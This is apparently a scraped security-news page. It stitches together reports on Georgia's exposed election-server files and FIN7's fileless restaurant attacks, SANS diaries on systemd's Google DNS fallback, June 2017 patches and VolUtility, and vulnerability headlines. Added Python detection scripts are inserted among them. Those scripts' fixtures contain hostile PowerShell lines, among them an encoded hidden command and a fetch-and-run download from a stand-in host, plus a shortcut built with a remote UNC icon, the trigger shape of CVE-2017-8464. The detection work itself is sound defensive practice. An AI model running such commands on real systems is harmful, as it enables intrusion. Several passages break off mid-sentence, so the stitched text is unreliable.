(credit: Verified Voting)

To understand why many computer scientists and voting rights advocates don't trust the security of many US election systems, consider the experience of Georgia-based researcher Logan Lamb. Last August, after the FBI reported hackers were probing voter registration systems in more than a dozen states, Lamb decided to assess the security of voting systems in his state.

According to a detailed report published Tuesday in Politico, Lamb wrote a simple script that would pull documents off the website of Kennesaw State University’s Center for Election Systems, which, under contract with Georgia, tests and programs voting machines for the entire state. By accident, Lamb's script uncovered a breach whose scope should concern Republicans and Democrats alike. Reporter Kim Zetter writes:

Within the mother lode Lamb found on the center’s website was a database containing registration records for the state’s 6.7 million voters; multiple PDFs with instructions and passwords for election workers to sign in to a central server on Election Day; and software files for the state’s ExpressPoll pollbooks — electronic devices used by poll workers to verify that a voter is registered before allowing them to cast a ballot. There also appeared to be databases for the so-called GEMS servers. These Global Election Management Systems are used to prepare paper and electronic ballots, tabulate votes and produce summaries of vote totals.

The files were supposed to be behind a password-protected firewall, but the center had misconfigured its server so they were accessible to anyone, according to Lamb. “You could just go to the root of where they were hosting all the files and just download everything without logging in,” Lamb says.

And there was another problem: The site was also using a years-old version of Drupal — content management software — that had a critical software vulnerability long known to security researchers. “Drupageddon,” as researchers dubbed the vulnerability, got a lot of attention when it was first revealed in 2014. It would let attackers easily seize control of any site that used the software. A patch to fix the hole had been available for two years, but the center hadn’t bothered to update the software, even though it was widely known in the security community that hackers had created automated scripts to attack the vulnerability back in 2014.

Lamb was concerned that hackers might already have penetrated the center’s site, a scenario that wasn’t improbable given news reports of intruders probing voter registration systems and election websites; if they had breached the center’s network, they could potentially have planted malware on the server to infect the computers of county election workers who accessed it, thereby giving attackers a backdoor into election offices throughout the state; or they could possibly have altered software files the center distributed to Georgia counties prior to the presidential election, depending on where those files were kept.

Lamb privately reported the breach to University officials, the report notes. But he learned this March that the critical Drupal vulnerability had been fixed only on the HTTPS version of the site. What's more, the same mother lode of sensitive documents was still exposed. The findings meant that the center had been operating outside the scope of both the University and the Georgia Secretary of State for years.


 
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
ESA-2017-031: RSA BSAFE® Cert-C Improper Certificate Processing Vulnerability
 
ESA-2017-043: EMC ESRS Virtual Edition Authentication Bypass Vulnerability
 
Microsoft Remote Desktop Protocol Remote Code Execution Vulnerability
 
Microsoft Windows Kernel CVE-2017-0167 Information Disclosure Vulnerability
 

(credit: Carol Von Canon)

Researchers have detected a brazen attack on restaurants across the United States that uses a relatively new technique to keep its malware undetected by virtually all antivirus products on the market.

Malicious code used in so-called fileless attacks resides almost entirely in computer memory, a feat that prevents it from leaving the kinds of traces that are spotted by traditional antivirus scanners. Once the sole province of state-sponsored spies casing the highest value targets, the in-memory techniques are becoming increasingly common in financially motivated hack attacks. They typically make use of commonly used administrative and security-testing tools such as PowerShell, Metasploit, and Mimikatz, which attackers use to feed malicious commands to targeted computers.

FIN7, an established hacking group with ties to the Carbanak Gang, is among the converts to this new technique, researchers from security firm Morphisec reported in a recently published blog post. The dynamic link library file it's using to infect Windows computers in an ongoing attack on US restaurants would normally be detected by just about any AV program if the file were written to a hard drive. But because the file contents are piped into computer memory using PowerShell, the file wasn't visible to any of the 56 most widely used AV programs, according to a VirusTotal query conducted earlier this month.
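Because the payload never touches disk, the place to look for this kind of activity is PowerShell's own logging rather than file scans. The following Python is an added example, not code from the Morphisec post or from this article: it scores logged script blocks against a handful of in-memory loading indicators (decoding of Base64 content, reflective assembly loading, Invoke-Expression, download-to-string). The indicator names, weights, and threshold are assumptions chosen for the example, and the log lines are constructed, not real telemetry.

```python
"""Heuristic triage of PowerShell script-block logging text for in-memory
(fileless) loading behaviour. Added example, not code from Morphisec or
Ars Technica; the sample log lines are constructed, not real telemetry."""
import re

# Indicators that script content is being decoded and loaded without ever
# being written to disk. Names and weights are assumptions chosen here.
INDICATORS = {
    "encoded_payload": (re.compile(r"FromBase64String|-EncodedCommand|-enc\b", re.I), 2),
    "reflective_load": (re.compile(r"\[System\.Reflection\.Assembly\]::Load\b", re.I), 3),
    "invoke_expression": (re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    "download_to_memory": (re.compile(r"DownloadString|DownloadData|Net\.WebClient", re.I), 2),
    "hidden_or_noprofile": (re.compile(r"-w(indowstyle)?\s+hidden|-nop\b", re.I), 1),
}
# A line whose indicator weights sum to this value or more is flagged.
# The threshold is an assumption; tune it against your own baseline.
ALERT_THRESHOLD = 3


def score_script_block(text):
    """Return (score, [matched indicator names]) for one logged script block."""
    matched = [name for name, (rx, _) in INDICATORS.items() if rx.search(text)]
    return sum(INDICATORS[name][1] for name in matched), matched


def triage(log_lines):
    """Return [(line_no, score, indicators)] for lines at or above the threshold."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        score, matched = score_script_block(line)
        if score >= ALERT_THRESHOLD:
            hits.append((line_no, score, matched))
    return hits


# Constructed sample script blocks. Lines 1-2 are ordinary administration
# and must not be flagged; lines 3-5 imitate the shapes described above.
# The Base64 text on line 3 is a placeholder ("AAAA"), not a real payload.
SAMPLE_LOG = [
    r"Get-ChildItem C:\Users -Recurse | Where-Object { $_.Length -gt 1MB }",
    r"Get-EventLog -LogName Security -Newest 50",
    r"powershell.exe -nop -w hidden -enc QQBBAEEAQQA=",
    r"$b=[Convert]::FromBase64String($d);[System.Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,$null)",
    r"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')",
]

if __name__ == "__main__":
    for line_no, score, matched in triage(SAMPLE_LOG):
        print(f"line {line_no}: score {score} {matched}")
```

The indicators are deliberately coarse: encoded commands and hidden windows also show up in legitimate automation, which is why each one only contributes a weight and the decision is made on the sum. In production the input would be the ScriptBlockText of event ID 4104 records rather than a list of strings.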


 

Google is everywhere and provides free services to everyone. Amongst the huge list of services publicly available is the Google DNS, well known as 8.8.8.8 and 8.8.4.4 (IPv4) and 2001:4860:4860::8888 and 2001:4860:4860::8844 (IPv6). But Google is far from being a non-profit organisation, and they collect a lot about you via their DNS[1]. Nothing is free: when you get something for free, you (your data) are the valuable stuff. Never forget this!

It is already known that many systems are using the Google DNS as a fallback configuration. Docker is a good example. As written in the documentation[2]:

After this filtering, if there are no more nameserver entries left in the container's /etc/resolv.conf file, the daemon adds public Google DNS nameservers (8.8.8.8 and 8.8.4.4) to the container's DNS configuration. If IPv6 is enabled on the daemon, the public IPv6 Google DNS nameservers will also be added (2001:4860:4860::8888 and 2001:4860:4860::8844).

Yesterday, some interesting tweets were passing around about the same kind of behaviour, but for systemd[3].

systemd is the new system introduced in 2012 to replace the good old init. From systemd's configure.ac[4]:

    AC_ARG_WITH(dns-servers, AS_HELP_STRING([--with-dns-servers=DNSSERVERS], [space-separated list of default DNS servers]), [DNS_SERVERS=$withval], [DNS_SERVERS=8.8.8.8 8.8.4.4 2001:4860:4860::8888 2001:4860:4860::8844])

How to interpret this code? systemd has a built-in fallback mechanism, fixed at compilation time, which uses the Google DNS by default if no resolvers are configured! I performed a quick check on different Linux distributions (installed out-of-the-box):

Distribution   Comments
ArchLinux      Found the commented line in /etc/systemd/resolved.conf:
               #FallbackDNS=8.8.8.8 8.8.4.4 2001:4860:4860::8888 2001:4860:4860::8844
CentOS         Nothing found
CoreOS         Nothing found
Debian         Nothing found
Fedora         Found the commented line in /etc/systemd/resolved.conf:
               #FallbackDNS=8.8.8.8 8.8.4.4 2001:4860:4860::8888 2001:4860:4860::8844
Gentoo         Nothing found
OpenSuse       Nothing found
RedHat ES      Not tested
Suse ES        Not tested
Ubuntu         Nothing found

Some distributions, like Slackware, never implemented systemd.

The purpose of FallbackDNS is defined in the resolved.conf manual page[5]:

A space-separated list of IPv4 and IPv6 addresses to use as the fallback DNS servers. Any per-link DNS servers obtained from systemd-networkd.service(8) take precedence over this setting, as do any servers set via DNS= above or /etc/resolv.conf. This setting is hence only used if no other DNS server information is known. If this option is not given, a compiled-in list of DNS servers is used instead.

I also found an old report about this in

    AC_ARG_WITH(ntp-servers, AS_HELP_STRING([--with-ntp-servers=NTPSERVERS], [space-separated list of default NTP servers]), [NTP_SERVERS=$withval], [NTP_SERVERS=time1.google.com time2.google.com time3.google.com time4.google.com])

Ok, nothing really critical here. Based on the tested distributions, there is little risk of systemd falling back to the Google DNS. However, it is a good reminder that developers may introduce dangerous features and/or configurations in their code. Grepping for static IP addresses in configuration files is always a good reflex. As for DNS, my recommendation is to restrict DNS traffic on your network and run your own resolver.
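The "grep for static IP addresses" reflex and the FallbackDNS= setting quoted from the manual page can be turned into a small audit. The Python below is an added example, not code from this diary, from systemd or from Docker: it scans configuration text for IPv4/IPv6 literals, notes whether each one sits on a commented-out line (a dormant default like the distributions' resolved.conf) and whether it is one of the Google resolvers named above, and then rewrites a resolved.conf so that FallbackDNS= is set explicitly, which per the manual page stops the compiled-in list from ever being used. The file contents are constructed samples, and 10.0.0.53 is an assumed internal resolver.

```python
"""Scan configuration text for hard-coded resolver addresses and pin
systemd-resolved's FallbackDNS to an internal resolver. Added example,
not code from the ISC diary, systemd or Docker; the file contents are
constructed samples and 10.0.0.53 is an assumed internal resolver."""
import ipaddress
import re
from collections import namedtuple

# The Google resolvers named in the diary; extend with any other public
# resolver you do not want your hosts to fall back to.
KNOWN_PUBLIC_RESOLVERS = {
    "8.8.8.8", "8.8.4.4", "2001:4860:4860::8888", "2001:4860:4860::8844",
}
IPV4_RX = re.compile(r"(?<![\w.])(?:\d{1,3}\.){3}\d{1,3}(?![\w.])")
# Candidate IPv6 text (including "::1" style); ipaddress validates it below.
IPV6_RX = re.compile(r"(?<![\w:])(?:[0-9a-fA-F]{1,4})?(?::[0-9a-fA-F]{0,4}){2,7}(?![\w:])")

Finding = namedtuple("Finding", "line address commented is_global known_resolver")


def scan_config(text):
    """Return every IP literal in the text, noting whether its line is commented
    out (a dormant default) and whether it is a known public resolver."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        commented = line.lstrip().startswith(("#", ";", "//"))
        for rx in (IPV4_RX, IPV6_RX):
            for match in rx.finditer(line):
                try:
                    ip = ipaddress.ip_address(match.group(0))
                except ValueError:  # e.g. a time-of-day such as 12:30:45
                    continue
                findings.append(Finding(line_no, str(ip), commented, ip.is_global,
                                        str(ip) in KNOWN_PUBLIC_RESOLVERS))
    return findings


def scan_files(files):
    """files: {path: text}. Return {path: [Finding, ...]} for files with literals."""
    report = {}
    for path, text in files.items():
        found = scan_config(text)
        if found:
            report[path] = found
    return report


def harden_resolved_conf(text, internal_resolvers):
    """Return resolved.conf text with FallbackDNS= set explicitly, so the
    compiled-in Google list is never used. Replaces an existing (possibly
    commented-out) FallbackDNS line, or appends one under [Resolve]."""
    new_line = "FallbackDNS=" + " ".join(internal_resolvers)
    out, replaced, has_section = [], False, False
    for line in text.splitlines():
        if re.match(r"\s*\[Resolve\]", line):
            has_section = True
        if not replaced and re.match(r"\s*#?\s*FallbackDNS\s*=", line):
            out.append(new_line)
            replaced = True
        else:
            out.append(line)
    if not replaced:
        if not has_section:
            out.append("[Resolve]")
        out.append(new_line)
    return "\n".join(out) + "\n"


# Constructed sample files: the distribution default seen in the table above,
# a Docker daemon config with one internal and one public resolver, and an
# NTP config with only internal addresses.
SAMPLE_FILES = {
    "/etc/systemd/resolved.conf": (
        "[Resolve]\n"
        "#DNS=\n"
        "#FallbackDNS=8.8.8.8 8.8.4.4 2001:4860:4860::8888 2001:4860:4860::8844\n"
        "#Domains=\n"
    ),
    "/etc/docker/daemon.json": '{\n  "dns": ["10.0.0.53", "8.8.8.8"]\n}\n',
    "/etc/chrony/chrony.conf": "server 10.0.0.123 iburst\nallow 10.0.0.0/24\n",
}

if __name__ == "__main__":
    for path, found in scan_files(SAMPLE_FILES).items():
        for f in found:
            tag = "PUBLIC RESOLVER" if f.known_resolver else ("global" if f.is_global else "internal")
            print(f"{path}:{f.line} {f.address} {'(commented)' if f.commented else ''} {tag}")
    print(harden_resolved_conf(SAMPLE_FILES["/etc/systemd/resolved.conf"], ["10.0.0.53"]))
```

A commented-out FallbackDNS= line is reported rather than ignored on purpose: it documents exactly what the compiled-in default is, which is the thing the diary is warning about. Setting the key to your own resolver is the configuration-side fix; blocking outbound port 53 except from that resolver is the network-side one.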

[1]https://developers.google.com/speed/public-dns/privacy
[2]https://docs.docker.com/engine/userguide/networking/default_network/configure-dns/
[3]https://en.wikipedia.org/wiki/Systemd
[4]https://github.com/systemd/systemd/blob/a083537e5d11bce68639c492eda33a7fe997d142/configure.ac#L1305
[5]https://www.freedesktop.org/software/systemd/man/resolved.conf.html#FallbackDNS=
[6]https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=761658
[7]https://github.com/systemd/systemd/blob/master/configure.ac#L1218

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key


Today, Microsoft and Adobe released their usual monthly security updates. Microsoft patched a total of 96 different vulnerabilities. Three vulnerabilities have already been disclosed publicly, and two vulnerabilities stick out for being already exploited according to Microsoft:

CVE-2017-8464

This vulnerability can be exploited when a user views a malicious shortcut file. Windows shortcuts are small files that describe the shortcut, including which icon Windows should display to represent the file. By including a malicious icon reference, the attacker can execute arbitrary code. This problem is probably most easily exploited by setting up a malicious file share and tricking the user into opening the file share via a link. Similar vulnerabilities have been exploited in Windows in the past, and public exploits should surface shortly. Microsoft's description of the vulnerability is somewhat self-contradictory: in the past, if a vulnerability had already been exploited in the wild, Microsoft labeled it with an exploitability index of 0. In this case, Microsoft uses 1, which indicates that exploitation is likely, while at the same time stating that the vulnerability is already being exploited.
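Because the trigger is the icon reference inside the shortcut, triage of suspicious .lnk files comes down to reading that field. The Python below is an added example, not Microsoft's or ISC's code: it parses the fixed 76-byte ShellLinkHeader and the StringData fields of a shortcut (the MS-SHLLINK layout) and flags an icon location that points at a remote UNC path or at a control-panel module. The sample shortcuts are built by build_lnk() as fixtures for the parser; they are ordinary shortcut files, not exploit files, and the share name is a placeholder.

```python
"""Parse the header and string fields of a Windows shortcut (.lnk,
MS-SHLLINK) and flag icon references that point off the local machine.
Added example for triage, not Microsoft's or ISC's code; the sample
shortcuts are constructed in build_lnk() and are not exploit files."""
import struct

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits that decide which optional structures follow the header.
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7
# StringData fields appear in this fixed order when their flag is set.
STRING_FIELDS = [
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
]


def parse_lnk(data):
    """Return the string fields and icon index of a shortcut, or raise ValueError."""
    if (len(data) < LNK_HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    icon_index = struct.unpack_from("<i", data, 56)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (2 bytes) + item IDs
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {"icon_index": icon_index}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters
        pos += 2
        size = count * 2 if unicode else count
        raw = data[pos:pos + size]
        if len(raw) != size:
            raise ValueError("truncated string data")
        pos += size
        fields[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252", "replace")
    return fields


def icon_risk(fields):
    """Reasons a shortcut's icon reference deserves a closer look (may be empty)."""
    icon = fields.get("icon_location", "")
    reasons = []
    if icon.startswith("\\\\"):
        reasons.append("icon is loaded from a remote UNC path")
    if icon.lower().endswith(".cpl"):
        reasons.append("icon reference names a control-panel module")
    return reasons


def build_lnk(icon_location, name="constructed sample"):
    """Build a minimal Unicode shortcut carrying only a name and an icon
    location; used here only to produce fixtures for parse_lnk()."""
    flags = HAS_NAME | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIiIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x80,        # FILE_ATTRIBUTE_NORMAL
                         0, 0, 0,     # creation / access / write FILETIMEs
                         0, 0, 1,     # FileSize, IconIndex, ShowCommand (SW_SHOWNORMAL)
                         0, 0, 0, 0)  # HotKey, Reserved1..3
    body = b""
    for text in (name, icon_location):   # BMP text only, so len() == UTF-16 units
        body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + body + b"\x00\x00\x00\x00"  # empty ExtraData terminal block


# Constructed fixtures: a normal shortcut and one whose icon lives on a share.
SAMPLES = {
    "benign.lnk": build_lnk(r"%SystemRoot%\system32\shell32.dll"),
    "suspicious.lnk": build_lnk(r"\\fileserver.example.invalid\share\icons.cpl"),
}


def triage(samples):
    """Return {filename: [reasons]} for every shortcut that raises a flag."""
    flagged = {}
    for filename, data in samples.items():
        reasons = icon_risk(parse_lnk(data))
        if reasons:
            flagged[filename] = reasons
    return flagged

if __name__ == "__main__":
    for filename, reasons in triage(SAMPLES).items():
        print(filename, "->", "; ".join(reasons))
```

The parser stops after StringData and ignores ExtraData, which is enough for the icon question; a UNC icon path is worth a look on its own because Explorer resolves it as soon as the shortcut is rendered, before the user clicks anything. Icons inside local .dll files are not flagged, since almost every system shortcut uses one.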

CVE-2017-8543

ETERNALBLUE reloaded? This vulnerability is another one that is already being exploited, according to Microsoft. It is triggered by sending a malicious Search message via SMB. The bulletin does not state whether exploitation requires authentication. The attacker gains full administrative access to the system, so this vulnerability can also be exploited for privilege escalation.

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute


If you would like to practice memory forensics using Volatility but you don't like command line tools and you hate to remember plugins, then VolUtility is your friend.

VolUtility[1][2] is a web frontend for the Volatility framework.

Installation

In this diary, I will install VolUtility on a Linux SIFT[3] workstation.

1. Update your SIFT workstation and install django

$ sudo apt-get update

2. Install MongoDB:

In this diary I am not going to discuss how to install MongoDB; for further details about

$ git clone https://github.com/volatilityfoundation/volatility

$ cd volatility

$ sudo python setup.py install

$ git clone https://github.com/kevthehermit/VolUtility

Configuration

In this diary I am going to use the default config file volutility.conf.sample

$ ./manage.py runserver 0.0.0.0:8000

Enter a name for the session and the location of the memory image; for the profile you can either specify it or choose autodetect, then click on the submit button.

You have to wait a few minutes till it finishes processing the image; once it has finished, the status will change to Complete.

To examine the image, click on the session name, in this diary SANS ISC.

Now let

And you can of course filter your results using tools such as MS Excel.

_______________________________________________________

[1] https://github.com/kevthehermit/VolUtility/wiki

[2] http://holisticinfosec.blogspot.com/2016/04/toolsmith-115-volatility-acuity-with.html

[3] https://digital-forensics.sans.org/community/downloads

 

With two new drivers in my home, I am training them to occasionally look in the rear view mirror of their car as an effective way to increase their situational awareness when driving. What if this principle were applied to the area of hardware and software inventory? Perhaps it could take the form of a quarterly reminder to revisit CIS Critical Security Controls 1 and 2, calling for an objective look at hardware and software that might not be as shiny and new. Intentionally searching for this type of deferred maintenance could very well find unnecessary risk that is imposed on the entire organization.

Some organizations have an interesting approach: for every new tool purchased, two tools must also be retired. What a novel section to include in the business justification for the next new tool. Take a look in the rear view mirror every once in a while, particularly at the area of technology retirement, to make sure you don't just continue to increase the collection of tools. Who knows what might be discovered.

What grade would you give yourself in the discipline of technology retirement? Please leave what works for you in our comments section below.

Russell Eubanks

ISC Handler

SANS Instructor

@russelleubanks

 

Tom Webb

 
Adobe Flash Player APSB17-17 Multiple Memory Corruption Vulnerabilities
 
Adobe Flash Player APSB17-17 Multiple Use After Free Remote Code Execution Vulnerabilities
 
Microsoft Internet Explorer CVE-2017-0222 Remote Memory Corruption Vulnerability
 
EMC VNX1/VNX2 OE for File CVE-2017-4987 Unspecified Local Untrusted Search Path vulnerability
 
Microsoft Skype for Business and Lync Server CVE-2017-8550 Remote Code Execution Vulnerability
 
EMC RSA BSAFE Cert-C CVE-2017-4981 Denial of Service Vulnerability
 
Mozilla Firefox CVE-2017-5471 Multiple Memory Corruption Vulnerabilities
 


 
[SECURITY] [DSA 3880-1] libgcrypt20 security update
 